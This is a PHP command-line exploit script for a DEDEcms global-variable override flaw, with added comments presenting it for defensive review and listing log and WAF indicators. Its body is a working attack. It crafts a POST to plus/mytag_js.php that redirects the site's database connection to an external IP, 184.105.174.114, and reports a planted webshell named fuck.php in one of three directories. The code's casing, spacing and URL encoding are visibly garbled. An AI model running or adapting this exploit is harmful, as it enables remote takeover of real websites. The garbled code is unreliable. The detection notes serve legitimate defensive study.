#! Usr/bin/php-w
<? Php
// Script body: a command-line proof-of-concept against the DEDEcms "variable
// coverage" issue (request data overriding application globals). Annotated here
// for defensive review: the request it sends is the pattern a WAF / access-log
// rule should match, and the file locations it reports are where a responder
// should look. (Identifier casing and spacing are garbled by extraction.)
// Suppress everything below E_ERROR, so socket and I/O warnings are not shown.
Error_reporting (E_ERROR );
// No execution-time cap for the outbound HTTP exchange performed by Getshell().
Set_time_limit (0 );
Print_r ('
DEDEcms Variable Coverage
Exploit Author: [url] www.heixiaozi.com [/url] [url] www.webvul.com [/url]
);
Echo "\ r \ n ";
// Argument check on the second positional argument (aid); prints the usage
// banner and stops when it is absent.
If ($ argv [2] = null ){
Print_r ('
+ --------------------------------------------------------------------------- +
Usage: php '. $ argv [0].' url aid path
Aid = 1 shellpath/data/cache aid = 2 shellpath =/aid = 3 shellpath =/plus/
Example:
Php '. $ argv [0].' [url] www.site.com [/url] 1 old
+ --------------------------------------------------------------------------- +
');
Exit;
}
// Positional arguments: target host (passed straight to fsockopen below, so
// presumably a bare hostname — verify), the aid variant selecting which
// location is reported, and the install subdirectory prefixed to the request path.
$ Url = $ argv [1];
$ Aid = $ argv [2];
$ Path = $ argv [3];
// Sends one POST and receives only the first line of the HTTP response.
$ Exp = Getshell ($ url, $ aid, $ path );
// "Success" is declared when the first response line contains "OK" past
// offset 12 (which an ordinary "HTTP/1.1 200 OK" status line satisfies). This
// does NOT confirm that any file was written on the server; a responder should
// check the filesystem rather than trust the HTTP status alone.
If (strpos ($ exp, "OK")> 12 ){
Echo "[*] Exploit Success \ n ";
// Location the script expects its payload to land, by aid: data/cache/, the
// install root, or plus/. These three directories are the places to inspect
// for unexpected .php files (the page names the file fuck.php).
If ($ aid = 1) echo "[*] Shell:". $ url. "/$ path/data/cache/fuck. php \ n ";
If ($ aid = 2) echo "[*] Shell:". $ url. "/$ path/fuck. php \ n ";
If ($ aid = 3) echo "[*] Shell:". $ url. "/$ path/plus/fuck. php \ n ";
} Else {
Echo "[*] Exploit Failed \ n ";
}
// Builds and sends, over a raw TCP socket, the single POST that carries the
// override payload, then returns the first line of the HTTP response.
//
// Detection / mitigation notes for defenders:
//  - Request shape: POST <path>/plus/mytag_js.php?aid=<n> with a form body whose
//    keys are _COOKIE[GLOBALS][cfg_db...]. Request parameters of that shape are
//    the indicator to alert on; the application-side fix is to stop request
//    data from populating $GLOBALS at all.
//  - The body redirects the application's database settings to an external
//    host (184.105.174.114 on this page), so an unexpected outbound MySQL
//    connection from the web server is a second signal.
//
// $ url  - target host, used verbatim for both fsockopen and the Host header
// $ aid  - value placed in the query string
// $ path - install subdirectory prefixed to the request path
// Returns the first response line, or null if the socket was never opened.
Function Getshell ($ url, $ aid, $ path ){
$ Id = $ aid;
$ Host = $ url;
// Plain HTTP on port 80 only; no TLS path exists in this function.
$ Port = "80 ";
// URL-encoded form body: doaction= points back at the target's own
// mytag_js.php, the _COOKIE[GLOBALS][...] keys carry the overridden DB
// connection settings, and nocache/QuickSearchBtn complete the form.
// (The percent-encoding is partly garbled by extraction.)
$ Content = "doaction = http % 3A % 2F % 2F $ host % 2 Fplus % 2Fmytag_js.php % 3 Faid % 3D1 & _ COOKIE % 5 BGLOBALS % 5D % 5Bcfg_dbhost % 5D = 184.105.174.114 & _ COOKIE % 5 BGLOBALS % 5D % 5b%_dbuser % 5D = exploit & _ COOKIE % 5 BGLOBALS % 5D % 5b%_dbpwd % 5D = 90sec & _ COOKIE % 5 BGLOBALS % 5D % 5b%_dbname % 5D = exploit & _ COOKIE % 5 BGLOBALS % 5D % 5b1__dbprefix % 5D = dede _ & nocache = true & QuickSearchBtn = % CC % E1 % BD % BB ";
// Hand-assembled HTTP/1.1 request; the User-Agent and Accept-* values below are
// fixed strings and can serve as a fingerprint in access logs.
$ Data = "POST/$ path/plus/mytag_js.php? Aid = ". $ id." HTTP/1.1 \ r \ n ";
$ Data. = "Host:". $ host. "\ r \ n ";
$ Data. = "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv: 5.0.1) Gecko/20100101 Firefox/5.0.1 \ r \ n ";
$ Data. = "Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8 \ r \ n ";
$ Data. = "Accept-Language: zh-cn, zh; q = 0.5 \ r \ n ";
// Left disabled by the original author; since only the status line is read
// below, the response encoding would not matter either way.
// $ Data. = "Accept-Encoding: gzip, deflate \ r \ n ";
$ Data. = "Accept-Charset: GB2312, UTF-8; q = 0.7, *; q = 0.7 \ r \ n ";
$ Data. = "Connection: keep-alive \ r \ n ";
$ Data. = "Content-Type: application/x-www-form-urlencoded \ r \ n ";
// Byte length of the body, as required for a POST.
$ Data. = "Content-Length:". strlen ($ content). "\ r \ n ";
$ Data. = $ content. "\ r \ n ";
// Opens a plain TCP connection with fsockopen's default timeout.
$ Ock = fsockopen ($ host, $ port );
// On connection failure only a message is printed; execution still falls
// through to fwrite/feof on a false handle (warnings are hidden by the
// error_reporting level set at the top of the script).
If (! $ Ock ){
Echo "[*] No response from". $ host. "\ n ";
}
Fwrite ($ ock, $ data );
// The loop body returns on its first iteration, so only the first response
// line (the HTTP status line) is ever read; the rest of the response is
// discarded and the socket is never explicitly closed.
While (! Feof ($ ock )){
$ Exp = fgets ($ ock, 1024 );
Return $ exp;
}
}
?>
From: sebug